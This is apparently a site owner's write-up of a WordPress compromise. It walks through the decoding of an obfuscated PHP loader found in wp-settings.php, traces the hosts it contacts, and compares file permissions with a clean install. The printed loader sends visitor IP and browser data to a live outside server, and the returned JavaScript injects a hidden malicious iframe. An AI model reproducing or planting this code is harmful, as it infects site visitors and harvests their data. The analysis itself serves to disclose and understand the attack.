Encryption Layer 2: $_X=base64_decode($_X);$_X=strtr($_X,’123456aouie’,’aouie123456′);$_R=ereg_replace(‘__FILE__’,”‘”.$_F.”‘”,$_X);eval($_R);$_R=0;$_X=0;  Encryption Layer 3: $_X=base64_decode($_X); Result: ?><?php $3rl = ‘http://96.69e.a6e.o0/bt.php’; ?>  Encryption Layer 4: $_X=strtr($_X,’123456aouie’,’aouie123456′); Result: ?><?php $url = ‘http://91.196.216.30/bt.php’; ?> Encryption Layer 5: $_R=ereg_replace(‘__FILE__’,”‘”.$_F.”‘”,$_X); Result: ?><?php $url = ‘http://91.196.216.30/bt.php’; ?> Evaluate Command: eval($_R); Result: ?><?php $url = ‘http://91.196.216.30/bt.php’; ?> $_R=0;$_X=0; Set these to 0 so you can’t echo them without recreating the encryption process step by step. Final Result of Encryption: $url =  ‘http://91.196.216.30/bt.php’; $ua = urlencode(strtolower($_SERVER[‘HTTP_USER_AGENT’])); $ip = $_SERVER[‘REMOTE_ADDR’]; $host = $_SERVER[‘HTTP_HOST’]; $uri = urlencode($_SERVER[‘REQUEST_URI’]); $ref = urlencode($_SERVER[‘HTTP_REFERER’]); $url = $url.’?ip=’.$ip.’&host=’.$host.’&uri=’.$uri.’&ua=’.$ua.’&ref=’.$ref; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 2); $re = curl_exec($ch); curl_close($ch); echo $re; } Complex! This is an enourmous amount of work to encrypt and throw off an investigator trying to figure out what happened to their site. It is an amazing level of complexity, kudos to the designer! This will make sure that you cannot search for ANY of the words, URL’s or text in your wordpress files or databases, there is no algorithm to do a search for something of this complexity, it was hard enough to break it down! All of this encoding to hide the URL: http://91.196.216.30/bt.php. The end result is that the script sends this data to the server, with all parameters, and echos whatever the server decides to spit back, in my case, it was the compressed javascript code, shown here uncompressed again for convenience: function MakeFrameEx() { element = document.getElementById(‘yahoo_api’); if (!element) { var el = document.createElement(‘iframe’); document.body.appendChild(el); el.id = ‘yahoo_api’; el.style.width = ‘1px’; el.style.height = ‘1px’; el.style.display = ‘none’; el.src = ‘http://hardpancakes.xe.cx/showthread.php?t=72291731′ } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf(“msie”) != -1 && ua.indexOf(“opera”) == -1 && ua.indexOf(“webtv”) == -1)) && ua.indexOf(“windows”) != -1) { var t = setTimeout(“MakeFrameEx()”, 500) } This code does a strange check to see if the user agent is internet explorer, opera, webtv or windows and if it is, or isnt, sets a timeout to make a iFrame with the previous code. This delay is perfect for stopping detection from bots, crawlers, and some passers by. It causes confusion when troubleshooting it as well. The interesting thing about this malicious code is that it uses well known names, such as yahoo_api to create a new element. This bit of code contacts a website known as hardpankaces.xe.cx, which then delivers its payload by opening up an iFrame to http://finderonlinesearch.com/tds/in.cgi?5&user=mexx. Note that the website in the iFrame was different earlier while troubleshooting, than it was shown, but the user always =mexx, whcih I found odd.  I found the javascript snippet on Pastebin of all places, posted by a guest with no comments. I was interested, where the hell are these domains going, and where is the IP Address located for the originating server that initializes the script? Frankfurt, Germany And Moscow, Russia. Here are the tracert logs and whois records, you can form opinions yourselves: Tracert  – Script Originating IP: Tracing route to 91.196.216.30 over a maximum of 30 hops 4 * * 23 ms 99.167.141.18 5 21 ms 20 ms 20 ms 12.83.70.9 6 22 ms 22 ms 22 ms fldfl01jt.ip.att.net [12.122.81.25] 7 30 ms 23 ms 23 ms 192.205.36.254 8 45 ms 36 ms 36 ms ae-32-52.ebr2.Miami1.Level3.net [4.69.138.126] 9 53 ms 47 ms 53 ms ae-2-2.ebr2.Atlanta2.Level3.net [4.69.140.142] 10 47 ms 47 ms 53 ms ae-73-73.ebr3.Atlanta2.Level3.net [4.69.148.253] 11 65 ms 69 ms 69 ms ae-2-2.ebr1.Washington1.Level3.net [4.69.132.86] 12 74 ms 74 ms 74 ms ae-91-91.csw4.Washington1.Level3.net [4.69.134.1 42] 13 64 ms 70 ms 64 ms ae-92-92.ebr2.Washington1.Level3.net [4.69.134.1 57] 14 149 ms 143 ms 150 ms ae-43-43.ebr2.Paris1.Level3.net [4.69.137.57] 15 148 ms 154 ms 154 ms ae-46-46.ebr1.Frankfurt1.Level3.net [4.69.143.13 7] 16 148 ms 154 ms 148 ms ae-61-61.csw1.Frankfurt1.Level3.net [4.69.140.2] 17 148 ms 154 ms 147 ms ae-1-60.edge3.Frankfurt1.Level3.net [4.69.154.7] 18 155 ms 155 ms 158 ms IPTRIPLEPLA.edge3.Frankfurt1.Level3.net [212.162 .40.194] 19 358 ms 197 ms 192 ms te7-2-pontiac.stk.citytelecom.ru [217.65.1.229] 20 186 ms 180 ms 186 ms te4-4-adelaida.spb.citytelecom.ru [217.65.1.201] 21 187 ms 178 ms 185 ms 62.152.42.134 22 215 ms 214 ms 220 ms 91.196.216.30 Whois – Script Originating IP: inetnum: 91.196.216.0 – 91.196.219.255 netname: SPETSENERGO-NET descr: SpetsEnergo Ltd. country: RU org: ORG-SL138-RIPE admin-c: KDS23-RIPE tech-c: KDS23-RIPE remarks: SPAM issues: [email protected] remarks: Network security issues: [email protected] remarks: General and other information: [email protected] status: ASSIGNED PI mnt-by: RIPE-NCC-END-MNT mnt-by: MNT-SPETSENERGO mnt-lower: RIPE-NCC-END-MNT mnt-routes: MNT-SPETSENERGO mnt-domains: MNT-SPETSENERGO source: RIPE #Filtered organisation: ORG-SL138-RIPE org-name: SpetsEnergo Ltd. tech-c: KDS23-RIPE admin-c: KDS23-RIPE remarks: SPAM issues: [email protected] remarks: Network security issues: [email protected] remarks: General and other information: [email protected] org-type: OTHER address: Russia, 127422, Moscow, Timiryazevskaya st, 11 mnt-ref: MNT-SPETSENERGO mnt-by: MNT-SPETSENERGO source: RIPE #Filtered person: Kruchkov Dmitry Sergeevich address: Russia, 127422, Moscow, Timiryazevskaya st, 11 abuse-mailbox: [email protected] phone: +7 916 959 2268 nic-hdl: KDS23-RIPE source: RIPE #Filtered route: 91.196.216.0/22 descr: SPETSENERGO origin: AS43239 mnt-by: MNT-SPETSENERGO source: RIPE #Filtered Tracert: http://hardpancakes.xe.cx/showthread.php?t=7229173 (46.4.108.18) 5 21 ms 21 ms 20 ms 12.83.70.9 6 44 ms 23 ms 22 ms fldfl01jt.ip.att.net [12.122.81.25] 7 30 ms 29 ms 23 ms 192.205.36.254 8 36 ms 35 ms 35 ms ae-32-52.ebr2.Miami1.Level3.net [4.69.138.126] 9 43 ms 36 ms 42 ms ae-2-2.ebr2.Atlanta2.Level3.net [4.69.140.142] 10 42 ms 38 ms 43 ms ae-73-73.ebr3.Atlanta2.Level3.net [4.69.148.253] 11 54 ms 53 ms 60 ms ae-2-2.ebr1.Washington1.Level3.net [4.69.132.86] 12 53 ms 58 ms 59 ms ae-81-81.csw3.Washington1.Level3.net [4.69.134.1 38] 13 57 ms 59 ms 53 ms ae-82-82.ebr2.Washington1.Level3.net [4.69.134.1 53] 14 146 ms 134 ms 140 ms ae-44-44.ebr2.Paris1.Level3.net [4.69.137.61] 15 139 ms 138 ms 146 ms ae-48-48.ebr1.Frankfurt1.Level3.net [4.69.143.14 5] 16 139 ms 144 ms 144 ms ae-81-81.csw3.Frankfurt1.Level3.net [4.69.140.10 ] 17 139 ms 144 ms 138 ms ae-3-80.edge3.Frankfurt1.Level3.net [4.69.154.13 5] 18 139 ms 145 ms 180 ms HETZNER-ONL.edge3.Frankfurt1.Level3.net [212.162 .40.206] 19 157 ms 158 ms 149 ms hos-bb1.juniper1.fs.hetzner.de [213.239.240.242] 20 153 ms 144 ms 144 ms hos-tr1.ex3k10.rz14.hetzner.de [213.239.224.139] 21 150 ms 144 ms 150 ms static.18.108.4.46.clients.your-server.de [46.4. 108.18] Trace complete. Whois: http://hardpancakes.xe.cx/showthread.php?t=7229173 (46.4.108.18) inetnum: 46.4.108.0 – 46.4.108.31 netname: HETZNER-RZ14 descr: Hetzner Online AG descr: Datacenter 14 country: DE admin-c: HOAC1-RIPE tech-c: HOAC1-RIPE status: ASSIGNED PA mnt-by: HOS-GUN mnt-lower: HOS-GUN mnt-routes: HOS-GUN source: RIPE #Filtered role: Hetzner Online AG – Contact Role address: Hetzner Online AG address: Stuttgarter Stra?e 1 address: D-91710 Gunzenhausen address: Germany phone: +49 9831 61 00 61 fax-no: +49 9831 61 00 62 abuse-mailbox: [email protected] remarks: ************************************************* remarks: * For spam/abuse/security issues please contact * remarks: * [email protected] , not this address * remarks: ************************************************* remarks: remarks: ************************************************* remarks: * Any questions on Peering please send to * remarks: * [email protected] * remarks: ************************************************* org: ORG-HOA1-RIPE admin-c: MH375-RIPE tech-c: GM834-RIPE tech-c: RB1502-RIPE tech-c: SK2374-RIPE tech-c: ND762-RIPE tech-c: TF2013-RIPE tech-c: MF1400-RIPE nic-hdl: HOAC1-RIPE mnt-by: HOS-GUN source: RIPE #Filtered route: 46.4.0.0/16 descr: HETZNER-RZ-FKS-BLK3 origin: AS24940 org: ORG-HOA1-RIPE mnt-by: HOS-GUN source: RIPE #Filtered Update Delete organisation: ORG-HOA1-RIPE org-name: Hetzner Online AG org-type: LIR address: Hetzner Online AG Attn. Martin Hetzner Stuttgarter Str. 1 91710 Gunzenhausen GERMANY phone: +49 9831 610061 fax-no: +49 9831 610062 admin-c: DM93-RIPE admin-c: GM834-RIPE admin-c: HOAC1-RIPE admin-c: MH375-RIPE admin-c: RB1502-RIPE admin-c: SK2374-RIPE admin-c: TF2013-RIPE admin-c: MF1400-RIPE mnt-ref: HOS-GUN mnt-ref: RIPE-NCC-HM-MNT mnt-by: RIPE-NCC-HM-MNT source: RIPE #Filtered Tracert: http://finderonlinesearch.com/tds/in.cgi?5&user=mexx (78.159.112.180) 5 21 ms 21 ms 22 ms 12.83.70.9 6 22 ms 22 ms 21 ms fldfl01jt.ip.att.net [12.122.81.25] 7 29 ms 27 ms 29 ms 192.205.36.254 8 24 ms 23 ms 29 ms 4.69.138.91 9 64 ms 71 ms 70 ms ae-2-2.ebr1.Dallas1.Level3.net [4.69.140.133] 10 64 ms 70 ms 64 ms ae-91-91.csw4.Dallas1.Level3.net [4.69.151.161] 11 66 ms 71 ms 64 ms ae-93-93.ebr3.Dallas1.Level3.net [4.69.151.170] 12 71 ms 70 ms 64 ms ae-7-7.ebr3.Atlanta2.Level3.net [4.69.134.22] 13 87 ms 80 ms 86 ms ae-2-2.ebr1.Washington1.Level3.net [4.69.132.86] 14 83 ms 87 ms 80 ms ae-81-81.csw3.Washington1.Level3.net [4.69.134.1 38] 15 81 ms 87 ms 81 ms ae-82-82.ebr2.Washington1.Level3.net [4.69.134.1 53] 16 168 ms 167 ms 161 ms ae-41-41.ebr2.Paris1.Level3.net [4.69.137.49] 17 172 ms 166 ms 166 ms ae-48-48.ebr1.Frankfurt1.Level3.net [4.69.143.14 5] 18 172 ms 167 ms 172 ms ae-61-61.csw1.Frankfurt1.Level3.net [4.69.140.2] 19 167 ms 183 ms 167 ms ae-1-60.edge4.Frankfurt1.Level3.net [4.69.154.8] 20 295 ms 203 ms 199 ms 212.162.5.234 21 182 ms 177 ms 176 ms 89-149-218-34.internetserviceteam.com [89.149.21 8.34] 22 183 ms 180 ms 182 ms 89-149-218-178.gatewayrouter.net [89.149.218.178 ] 23 183 ms 175 ms 182 ms 78.159.112.180 Trace complete. Whois: http://finderonlinesearch.com/tds/in.cgi?5&user=mexx (78.159.112.180) inetnum: 78.159.112.0 – 78.159.115.255 netname: NETDIRECT-NET descr: Leaseweb Germany GmbH (previously netdirekt e. K.) remarks: INFRA-AW country: DE admin-c: WW200-RIPE tech-c: SR614-RIPE status: ASSIGNED PA mnt-by: NETDIRECT-MNT mnt-lower: NETDIRECT-MNT mnt-routes: NETDIRECT-MNT source: RIPE #Filtered person: Wiethold Wagner address: Leaseweb Germany GmbH (previously netdirekt e. K.) address: Kleyer Strasse 79 / Tor 14 address: 60326 Frankfurt address: DE phone: +49 69 90556880 fax-no: +49 69 905568822 abuse-mailbox: [email protected] nic-hdl: WW200-RIPE mnt-by: NETDIRECT-MNT source: RIPE #Filtered person: Simon Roehl address: Leaseweb Germany GmbH (previously netdirekt e. K.) address: Kleyer Strasse 79 /Tor 14 address: 60326 Frankfurt address: DE phone: +49 69 90556880 fax-no: +49 69 905568822 abuse-mailbox: [email protected] nic-hdl: SR614-RIPE mnt-by: NETDIRECT-MNT source: RIPE #Filtered route: 78.159.96.0/19 descr: ORG-nA8-RIPE origin: AS28753 org: ORG-nA8-RIPE mnt-lower: NETDIRECT-MNT mnt-routes: NETDIRECT-MNT mnt-by: NETDIRECT-MNT source: RIPE #Filtered organisation: ORG-nA8-RIPE org-name: netdirect org-type: LIR address: netdirekt e. K. Kleyer Strasse 79 / Tor 14 60326 Frankfurt Germany phone: +49 69 90556880 fax-no: +49 69 905568822 admin-c: SR614-RIPE admin-c: WW200-RIPE mnt-ref: NETDIRECT-MNT mnt-ref: RIPE-NCC-HM-MNT mnt-by: RIPE-NCC-HM-MNT source: RIPE #Filtered Permissions Permissions are important, and here is where it gets confusion, I am not sure If it was I that left the permissions on this specific account so open (757) or if someone else logged in and did it, or if there was some WordPress vulnerability that was able to do this, but the permissions on all the files were different than my safe and unaffected installs. I am assuming that there is some vulnerability in WordPress that allows a user to write to these directories if the permissions are set in such a way, but I have no evidence or lead as to what it was that did it. Notice in the examples below that the dirty folder structure has wp-settings.php modified sometime in September, but other wp- files modified around the same day of installation, this was not me, as I modifying it to fix it on the 13th. Example Clean Folder Structure rw-r–r– 1 root root 561 Jun 2 13:53 .htaccess -rw-r–r– 1 root root 397 Sep 15 15:16 index.php -rw-r–r– 1 root root 16899 Sep 15 15:17 license.txt -rw-r–r– 1 root root 9202 Sep 15 15:16 readme.html -rw-r–r– 1 root root 4343 Sep 15 15:16 wp-activate.php drwxr-xrwx 9 root root 4096 Sep 15 15:17 wp-admin -rw-r–r– 1 root root 40243 Sep 15 15:16 wp-app.php -rw-r–r– 1 root root 226 Sep 15 15:16 wp-atom.php -rw-r–r– 1 root root 274 Sep 15 15:16 wp-blog-header.php -rw-r–r– 1 root root 3931 Sep 15 15:16 wp-comments-post.php -rw-r–r– 1 root root 244 Sep 15 15:16 wp-commentsrss2.php -rwxr-xrwx 1 root root 3471 Sep 19 10:04 wp-config.php -rw-r–r– 1 root root 3177 Sep 15 15:16 wp-config-sample.php drwxr-xrwx 8 root root 4096 Sep 19 10:04 wp-content -rw-r–r– 1 root root 1255 Sep 15 15:16 wp-cron.php -rw-r–r– 1 root root 246 Sep 15 15:16 wp-feed.php drwxr-xrwx 8 root root 4096 Sep 15 15:17 wp-includes -rw-r–r– 1 root root 1997 Sep 15 15:16 wp-links-opml.php -rw-r–r– 1 root root 2525 Sep 15 15:16 wp-load.php -rw-r–r– 1 root root 27601 Sep 15 15:16 wp-login.php -rw-r–r– 1 root root 7774 Sep 15 15:16 wp-mail.php -rw-r–r– 1 root root 494 Sep 15 15:16 wp-pass.php -rw-r–r– 1 root root 224 Sep 15 15:17 wp-rdf.php -rw-r–r– 1 root root 334 Sep 15 15:17 wp-register.php -rw-r–r– 1 root root 226 Sep 15 15:16 wp-rss2.php -rw-r–r– 1 root root 224 Sep 15 15:16 wp-rss.php -rw-r–r– 1 root root 9839 Sep 15 15:17 wp-settings.php -rw-r–r– 1 root root 18646 Sep 15 15:17 wp-signup.php -rw-r–r– 1 root root 3702 Sep 15 15:17 wp-trackback.php -rw-r–r– 1 root root 3266 Sep 15 15:16 xmlrpc.php Example Dirty Folder Structure drwxr-xr-x 5 root root 4096 Sep 29 23:05 . drwxr-xr-x 3 root root 4096 Oct 10 17:42 .. -rwxr-xr-x 1 root root 200 Aug 25 17:29 .htaccess -rwxr-xrwx 1 root root 397 May 25 2008 index.php -rwxr-xrwx 1 root root 16899 Jun 8 13:18 license.txt -rwxr-xrwx 1 root root 9202 Jul 12 13:24 readme.html -rwxr-xrwx 1 root root 4343 May 6 22:26 wp-activate.php drwxr-xrwx 9 root root 4096 Jul 12 14:24 wp-admin -rwxr-xrwx 1 root root 40243 Jun 1 17:03 wp-app.php -rwxr-xrwx 1 root root 226 Dec 9 2010 wp-atom.php -rwxr-xrwx 1 root root 274 Nov 20 2010 wp-blog-header.php -rwxr-xrwx 1 root root 3931 Dec 9 2010 wp-comments-post.php -rwxr-xrwx 1 root root 244 Dec 9 2010 wp-commentsrss2.php -rwxr-xrwx 1 root root 3166 Aug 24 19:21 wp-config.php drwxr-xrwx 6 root root 4096 Oct 12 19:21 wp-content -rwxr-xrwx 1 root root 1255 Mar 16 2010 wp-cron.php -rwxr-xrwx 1 root root 246 Dec 9 2010 wp-feed.php drwxr-xrwx 8 root root 4096 Sep 30 01:35 wp-includes -rwxr-xrwx 1 root root 1997 Oct 23 2010 wp-links-opml.php -rwxr-xrwx 1 root root 2525 Jun 29 11:50 wp-load.php -rwxr-xrwx 1 root root 27601 Jun 22 14:45 wp-login.php -rwxr-xrwx 1 root root 7774 May 25 2010 wp-mail.php -rwxr-xrwx 1 root root 494 Dec 9 2010 wp-pass.php -rwxr-xrwx 1 root root 224 Dec 9 2010 wp-rdf.php -rwxr-xrwx 1 root root 334 Dec 9 2010 wp-register.php -rwxr-xrwx 1 root root 226 Dec 9 2010 wp-rss2.php -rwxr-xrwx 1 root root 224 Dec 9 2010 wp-rss.php -rwxr-xrwx 1 root root 10969 Sep 12 05:39 wp-settings.php -rwxr-xrwx 1 root root 18646 May 22 17:30 wp-signup.php -rwxr-xrwx 1 root root 3702 Feb 24 2010 wp-trackback.php -rwxr-xrwx 1 root root 3266 Apr 17 03:35 xmlrpc.php The Questions How did it get in? I have no idea. My permissions were set way too losely on this site, I believe they were set to 757 whereas all my others are 755 or less. This gives public access to write to the server. Still…what did they use to access and write to the server? There was only one username, my box has no other user accounts on it, and FTP is disabled, I only use SSH and SFTP. It is puzzling, any insights or suggestions are appreciated. Who are these Russians / Germans that are hosting these sites? What are they trying to pull? I would love to recreate the injection on my own on a clean box and browser to see what javascript and data it pulls from the other sites, I’d have to install something to sniff out the data coming between the injected iFrame and javascript and the site, but thats for another day when I actually have time! My next step should probably be to e-mail these people, or give them a ring, see if they even know this is happening through their servers. I hope this article has been helpful, I look forward to further analysis in comments!  

Read more